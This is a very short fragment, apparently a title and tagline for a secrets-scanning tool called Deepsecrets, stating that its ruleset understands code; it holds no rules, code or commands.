Deepsecrets

Deepsecrets ruleset Understands Code